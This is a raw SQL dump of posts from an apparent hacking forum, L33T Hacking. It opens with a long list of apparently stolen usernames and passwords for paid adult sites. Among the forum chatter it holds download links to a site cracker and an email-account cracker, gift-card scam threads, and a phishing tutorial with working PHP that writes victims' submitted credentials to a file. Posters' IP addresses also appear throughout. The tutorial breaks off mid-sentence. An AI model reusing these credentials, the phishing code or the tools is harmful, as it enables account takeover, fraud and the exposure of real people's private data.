http://38tmac:cubbies1@members.trampling*****.com/full/ http://AdRock10:cmack10@members.tram...****.com/full/ http://RichMerc:scotland@members.tra...****.com/full/ http://agcgag:SCREWEY@members.trampling*****.com/full/ http://amadeus:mozart@members.trampling*****.com/full/ http://hagan416:password@members.tra...****.com/full/ http://hagan252:password@members.tra...****.com/full/ http://cock337:se109707@members.tram...****.com/full/ http://disaster:irland@members.trampling*****.com/full/ http://jmaderic:VpAY5u@www.simonscans.com/members/ http://Farmer78:rwAWNE@www.simonscans.com/members/ http://dannyakuhar:ySoZma@www.simonscans.com/members/ http://rposliff:Journey1@www.simonscans.com/members/ http://aforman:steel24@www.simonscans.com/members/ http://andrey:pavlov@www.xtremephoto.../html/members/ http://aztnm:tdm@www.xtremephotovip.com/html/members/ http://base:soft@www.xtremephotovip.com/html/members/ http://cellk:kiss@www.xtremephotovip.com/html/members/ http://1178:constwor@ideepthroat.com...2/members.html http://3957:Holylemo@ideepthroat.com...2/members.html http://3889:analysis@ideepthroat.com...2/members.html http://1546:terryrob@ideepthroat.com...2/members.html http://JACKWC:WTONY@www.realitymembe...vegassexparty/ http://willyd1:willyd2@www.realityme...embers/voyeur/ http://werfer:won@www.realitymembers...ringbreakhoes/ http://dudehard:feline@members.colle...tour.com/full/ http://scase01:christ@members.college****tour.com/full/ http://ltanners:corriesf@www.cumonmy...s.com/members/ http://kaw098:098kaw@www.cumonmyglasses.com/members/ [hr] http://ma.brazzers.com/ Chino1786:agatha1 ericc1:99neill1 guenter1:handball gstewart:rainbow grim1701:ncc1701 jab9399:afmb1223 ivanhildo:meerzorg jackal98:joanna hoordog1:YUFF85an edgrau:200569 gregulator1:gokart12 mct4478:Knew0s Gill0R1:mypecs12 chromeburn:883971tt chupes:030670 chitown2:whitesox martyridge:ridgeman GreekGaucho:squeege silverstreak67:fullmoon1 smokinn:1smokinn1 lesw4ever:lesw4life sparky1:chuckie1 login here: mobile.realitykings.com realistprez:9184168 Viggo666:deadman h040385:9100893 heowlock:lancheow allain31:all4222 santiger:santiger22 http://members.naughtyamerica.com/index.php?m=login fredjf50:fjfdoc11 ardenne2:we11ington blinky615:without firebuster:e2T13R10b vegasfx:THPXL anaryagug94:lumsfg41 thome531:w523dmh wildcat-22:longhorns dekester:hunter duckduck:duckgoos ecg49ers:49ersecg ennomasl:voxhuma manboard:blue23 sasquach:zkio78 tort2004:storks http://twistys.com/ edwinres:marlins chonny:ch8an3go buckman:solo456 Porn-w.org:Anal****ingOnEspn mtmp90:martian rkelly6064:jedi88 gromittd:redwiaeu Jimson:8710079 hornybeast:hornybeast69 http://members2.mofos.com/members/ divman7:ricky007 GS21Gracian:KbPb52a zfreund:gaunga diseasicon:sillybum bestccrunner@aol.com:1runner big_3ta@hotmail.com:3amer1 biggross2000@hotmail.com:biggross http://members.anilos.com rvp128ass222 seqou5s:copper kli34xx23ass brainrevass23 svasileass232 bra23vop:23pass milfyblogass232 pic999:hunter1 beeker:asdf67jk http://passion-hd.com/login juelzhot:manning10 http://barely18barbie.com/members kellron88:zavooo88 mk2112:s8pjan3l http://bikini-heat.com/area51 pppppppp:gggggggg t_f_0000:7angels http://members.brianabanged.com 020ef7f6:029003d7 038042af:03804986 http://workmycock.com/members alecounet:911911 domino35:hildab rominsarid:romin123 http://xpass.com/members/ billing:review cherokii:indianer http://puremature.com/login steddysteds:nothing1 http://members.accessdvdsnow.com/login/ Tessa002:Sophy052 http://www.dirtyukwives.com/members_awiz/ coaltiger:wakanda http://members.bikinidream.com/ wm_102266:2XTxdvE3 http://porngantic.com/sblogin/login.shtml/membersarea/ loki2496:nightwin2000 Login: http://workmycock.com/members User/PW: alecounet:911911 http://showgirlzexclusive.com character:followin pbartonb757909 sturdytime:brittany captlou:telemark qwerty13:qwerty35 Porn-W.org:GotToLearnToEatPussy jazztrane:omegared busybee:melinda1 cshwgm1:Kordell1 saltin:scrappie jayzeedogg:biggdogg http://penthouse.com woodstock:d0nny1r4w4n http://members.downloadpassmobile.com/login.html Warren:Airforce Code = 83560 http://members.18andabused.videosz.com bader1010:maha1010 http://Vip.smut.com tijhuisj:jlat1309 http://cfnmtv.com rwambolt:captain juan2710:jclh2710 kalel666:yossi666 pongid:shinmen buddyarg:milesarg http://v2.shareadult.com/members/ clyngh:elliott flashed89:temp07 http://vivid.com&nbsp; Chuter:Libra25 http://members.hustler.com/ b7hnph:mu1mzj ipcusa1114:ipcusa http://myhotwife.com/ mxxx01:trombone CHRISA:131313', '94.132.244.168', '1585771688', '1', '0', '62', '1346879203', '1', 'f2710a42eebb3c6e1b6427640b3dad04', '0', '1346879203'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1615', '323', '1611', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346880353', '[quote=\'iTzIpod\' pid=\'1611\' dateline=\'1346875256\'] [quote=\'t3h jok3r\' pid=\'1592\' dateline=\'1346812975\'] [quote=\'iTzIpod\' pid=\'1582\' dateline=\'1346801158\'] [quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\'] I can understand, we have some cool updates coming up for LH. [/quote] Mind PMing me some info or spoilers? [/quote] Nope, it spoils the fun. [/quote]But it builds up the curiosity. Waiting is not really fun :3 [/quote]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9cf1cb883205d62f4bb728bb46c2d185', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1616', '323', '1615', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346884685', '[quote=\'t3h jok3r\' pid=\'1615\' dateline=\'1346880353\'] [quote=\'iTzIpod\' pid=\'1611\' dateline=\'1346875256\'] [quote=\'t3h jok3r\' pid=\'1592\' dateline=\'1346812975\'] [quote=\'iTzIpod\' pid=\'1582\' dateline=\'1346801158\'] [quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\'] I can understand, we have some cool updates coming up for LH. [/quote] Mind PMing me some info or spoilers? [/quote] Nope, it spoils the fun. [/quote] Waiting is not really fun :3 [/quote] But it builds up the curiosity. [/quote] True. :p But I find spoilers fun :3 It\'s not like I\'m going to be telling everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bbab4b2916ce83936caa27b8be262ace', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1617', '342', '0', '3', '[Announcement] Domain Change', '0', '82', 'iTzIpod', '1346885024', 'Hey LH, Recently/Earlier today, L33t Hacking was experiencing errors. This was because of the domain change. t3h jok3r recently changed the domain name of L33t Hacking. The previous domain was l33thacking.com And now, the current/new domain is l33thacking.net This is just a small update.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '80025ec84c1128458e6e89696f661db6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1619', '323', '1505', '7', 'RE: If I go inactive', '0', '61', 'NXK', '1346898215', 'You guys should respect that he\'s going to school. I honestly encourage you to do so and try as hard as you can. It will help you so much in the long run. Right now i\'m in college a year behind all my friends because I skipped in high school and played video games, Smoked weed and party\'d. Look where it got me.. Pretty much no where. I\'ve changed And honestly All I can say is good luck man and keep trying. You\'re doing the right thing.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'fa73904a412cf8f7165c9bb4f4bc0281', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1620', '238', '1468', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346900697', '[quote=\'iTzIpod\' pid=\'1468\' dateline=\'1346644371\'] [quote=\'Timmy\' pid=\'1461\' dateline=\'1346643920\'] Banned for having a blue username. [/quote] Banned for posting above me. [/quote] Banned for being in \"Unique.\"', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'e85960d1e17282a2d99090d7e3fac157', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1621', '249', '1428', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346900760', '[quote=\'iTzIpod\' pid=\'1428\' dateline=\'1346505643\'] Baws, you\'re not winning. I am. [/quote] You might wanna check again.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'e21608ec1ddff514d7c09680db5d13a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1622', '323', '1505', '7', 'RE: If I go inactive', '0', '55', 'Baws', '1346900827', 'I started yesterday too, too much homework man. -_-', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '9314f5adac54b9298ff286d81fcc7807', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1623', '344', '0', '3', 'Quick Updates and Notices V.2', '0', '1', 't3h jok3r', '1346900949', 'These are some recent updates and stuff I\'m working on. [list] [*] L33THacking has a new URL [*] Username History Plugin Updated and from now on, members can\'t edit post after a Moderator edit [*] LH Staff are currently working on the email issues. [*] Awards plugin is being a bitch and it\'s taking longer than I thought to fix it. [*] Congratz NXK on the promotion to Staff, JakeUS was demoted upon request. [*] All welcome PMs that we auto send when people activate their accounts have been deleted. WE DID [b]NOT[/b] ENTER INTO ANYONES\' ACCOUNT! [*][i][b] We will get some SQL Errors for few mins that\'s because I\'m going to be fixing the Awards plugin. Please report any SQL Errors you get in this forum by creating a thread. [/list][/b][/i] [b]Updated[/b] [list] [*] Fixed the complaints section bug [*] [size=large][b]L33THacking staff has decided to NEVER keep ADs on LH even though we need money to run LH we will manage from upgrades, stickies and donations. One upgrade can keep LH up for at least a month.[/b][/size] [/list]', '72.229.164.105', '1223009385', '1', '0', '1', '1346946869', '1', 'bffc8a9e3e69e11250834ebc7b564703', '0', '1346946869'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1625', '344', '1623', '3', 'RE: Quick Updates and Notices', '0', '61', 'NXK', '1346903158', 'This is awesome. I\'m loving how much things are moving along here, And only getting better!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'd4d1083f572dc862072a577326caec0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1626', '344', '1623', '3', 'RE: Quick Updates and Notices V.2', '0', '1', 't3h jok3r', '1346946897', 'Updated the thread, for those who ave read this read already please read the updated two points.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a1b5022f41befd9730303e8fce8f691c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1627', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '62', 'R?????zo?', '1346958744', 'I\'m winning like a baws :P sorry baws, had to say it :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5e671d39b6a47cb08c28bae5ce1f2f96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1628', '344', '1623', '3', 'RE: Quick Updates and Notices V.2', '0', '82', 'iTzIpod', '1346961651', 'Dang. 1 Upgrade = 1 month? Woah :o Gratz NXK on SMod. JakeUS sad to see you get demoted upon request :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7b3e0822e8bff05e9deda2f28ed788a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1629', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346961745', 'Just finished my homework now. =] Thank God. @NXK, good luck with your future. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68de29cf1d9a52f4dee268d5cc83978a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1630', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346961786', 'Lol @Reloadzor but still, I won.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb1627ef50340aa346eff5e4c04efeed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1631', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346961828', 'Banned for not being in Unique. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a919e504394d398bcf30696d2040da5a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1632', '345', '0', '63', 'Need userbar! [Gamers]', '0', '61', 'NXK', '1346962407', 'Iv\'e been working on userbars for a (Possible new group) <- Not confirmed. But take a look at these 2 user bars I came up with. Tell me what you think :) (these are just in beta stage) http://imgur.com/a/dd02l or [img]http://i.imgur.com/t92Nl.png[/img] [img]http://i.imgur.com/mIg5W.png[/img] Iv\'e decided to let the community help with this one! If you can do better post it in this thread. I\'m not into graphics really at all. I just have some basic photoshop knowledge. If you think you can do better let me know.', '99.253.65.17', '1677541649', '0', '0', '1', '1347249017', '1', '2c843d4f674ec7eaa1705f3fc8fca2d6', '0', '1347249017'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1633', '281', '1543', '84', 'RE: Upload N Sell Exploit', '0', '82', 'iTzIpod', '1346962736', '[quote=\'sirchamp\' pid=\'1543\' dateline=\'1346766658\'] Same by me bchkhackforums something XBL theres some key in it [/quote] Yeah. I always get that message. I don\'t know why.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ca68efa220ca80801977c3fc98dfcdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1634', '191', '1605', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346962803', '[quote=\'sirchamp\' pid=\'1605\' dateline=\'1346857255\'] Good luck with taking down facebook or wathever huge site you tried.. [/quote] Rolf. Are you trying to kill me via laughter? O_o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '94dcb9ab36d2c1591da5d066f2888f06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1635', '340', '1604', '16', 'RE: Free Nike\'s SE', '0', '112', '??????Z', '1346963257', 'Both sent! :) let me know how you all get on :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '09952c486eba80289d4c3bd756b51351', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1636', '238', '1631', '56', 'RE: Ban the user above you', '0', '61', 'NXK', '1346963554', '[quote=\'iTzIpod\' pid=\'1631\' dateline=\'1346961828\'] Banned for not being in Unique. ;) [/quote] banned cuz bald', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0e240d318f96886ec071cd0452909b2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1637', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346963756', 'Smart guy... Hmm.. Banned for having some abstract avatar? :o I really don\'t know what that is...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d13c61df9ef827d7b1810f7e2fad916', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1638', '345', '1632', '63', 'RE: Userbars [Gamers]', '0', '82', 'iTzIpod', '1346963845', 'I like the second one since the mushrooms pop out. But I really hate mushrooms. I would like the first one if coins came out :p But for right now, I would say the mushroom one..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '591ec1923370dda5bc782205faaadf28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1639', '238', '1637', '56', 'RE: Ban the user above you', '0', '61', 'NXK', '1346963892', '[quote=\'iTzIpod\' pid=\'1637\' dateline=\'1346963756\'] Smart guy... Hmm.. Banned for having some abstract avatar? :o I really don\'t know what that is... [/quote] Banned for not knowing the head shot icon in counter strike. The platform game for ANY FPS out there today.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '83f866566687cec255f2bb184171c6e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1640', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346963961', 'Banned for thinking I play Counter Strike..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c83a0d59fba0c8a07d31b1fe433294ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1641', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '112', '??????Z', '1346964231', 'attempted McDonald\'s and Nandos. will update if it works out :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '839857dbf021453343e3f485a59d5bf4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1642', '346', '0', '19', '[Junk]Heads Up', '0', '82', 'iTzIpod', '1346964654', 'Please don\'t expect us to be releasing a lot of stuff. Since right now, the forum is still low on active members.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7fd1bc98b78a2144db04df1ad30d58f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1643', '347', '0', '19', '[Junk]Warning', '0', '178', 'The Host', '1346966395', 'Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro', '94.13.132.145', '1577944209', '1', '0', '0', '0', '1', '5a22e4700f432d2e21de5cd2f406d2d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1644', '347', '1643', '19', '[Junk]Warning', '0', '1', 't3h jok3r', '1346966469', 'This thread has been junked.', '173.245.64.101', '-1376436123', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1645', '338', '1610', '4', 'RE: Hola', '0', '112', '??????Z', '1346968042', '[quote=\'Apathy\' pid=\'1610\' dateline=\'1346875125\'] Try to be active and enjoy your stay. [/quote] Thanks, will do :)', '92.22.251.182', '1545010102', '0', '0', '0', '0', '1', '035afac4d5e2b8967b972ecc4ff5d213', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1646', '344', '1628', '3', 'RE: Quick Updates and Notices V.2', '0', '1', 't3h jok3r', '1346968909', '[quote=\'iTzIpod\' pid=\'1628\' dateline=\'1346961651\'] Dang. 1 Upgrade = 1 month? Woah :o Gratz NXK on SMod. JakeUS sad to see you get demoted upon request :/ [/quote] The best is always expensive.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '452e343a0b615224a9bb936359e0e14b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1647', '348', '0', '30', 'Brazzers Cracker', '0', '1', 't3h jok3r', '1346970335', 'Pic: [img]http://i54.tinypic.com/2s6lf7b.jpg[/img] Video: [video=youtube]https://www.youtube.com/watch?v=2HVApTq4HpA[/video] VirusScan: http://www.virustotal.com/file-scan/repo...1315777537 Download: [url=http://uploading.com/files/dm3ab224/Br4223r5.rar/]Br4223r5.rar - 1.7 MB[/url]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '97190558342e07c9cdb858e402a4d3db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1648', '349', '0', '33', 'Everyone Read', '0', '82', 'iTzIpod', '1346970400', 'Are you new to GFX? Well then, you\'re lucky. I will help you make GFX just like me. Well, atleast I will try my best. I won\'t guarantee anything. But I will teach you the basics. Note: Please don\'t ask me questions about Gimp. I don\'t use it nor recommend it. If you want Photoshop CS3 or Photoshop CS4, then visit : http://www.youtube.com/watch?v=dLrqDVRBers Also, this is not my video. And add me on Skype for more info!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64af4d6ffd2eb3e54723d88bc3a7eaa9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1649', '350', '0', '18', 'WESTi\'s Email Cracker (Crack Any E-Mail - Hotmail, Yahoo, Gmail)', '0', '1', 't3h jok3r', '1346970708', 'This is a tool which cracks e-mail account(s). It can crack any service. Download: [code] http://www.multiupload.com/PVP8T8J6JF OR http://uploading.com/files/mdcdb469/Email_Cracker-www.l33ts.org.rar/ [/code] Password: [code] www.l33ts.org [/code] Scan and open with Sandboxie. Enjoy! :)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2b29064354963d3b63eaae2e5a4a94b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1650', '191', '666', '15', 'RE: ProDos v1.0', '0', '8', 'spacefish36', '1346970950', 'LMAO, but this knocks down sites for only couple of mins. Does work in a way.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '866662eb693ddfa47423fd37189a81c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1651', '351', '0', '46', 'Phishing Tutorial', '0', '8', 'spacefish36', '1346971069', 'This is a basic tutorial on how to make a phishing page. Index: What is a phisher? - 101 Making a T35 Account - 102 Getting Web pages Source Code - 103 Creating Phish File - 104 How to fool people - 105 ------------------------ What is a phisher? 101 ------------------------ A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you. -------------------------- Making a T35 Account 102 -------------------------- In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07. -------------------------------------- Getting Web Pages Source Code 103 -------------------------------------- After you create that page, go to the website you will make a phisher for. Open the login page, From there right-click the page, and click View Source. Copy and paste what has popped-up. ------------------------ Creating Phish File 104 ------------------------ Once you have that copied, go to your T35 account. Click on \"New File\" Title it login.htm Then paste your Source Code you copied from 104. Save it. Now create another file, title it fhish.php And inside, paste this code: [code] <?php header(\"Location: http://www.phisshed-website.com\"); $handle = fopen(\"thepasses.txt\", \"a\"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, \"=\"); fwrite($handle, $value); fwrite($handle, \"\\r\\n\"); } fwrite($handle, \"\\r\\n\"); fclose($handle); exit; ?> [/code] The http://www.phisshed-website.com is what the page goes to after the victim logs in, change that to what desired Save the file. Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher! ------------------------- How to fool people - 105 ------------------------- What you do now is disguise your link. Use this code: T35acount.spam.com/login.htm That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code. [url=xxx.spam.com]*real website 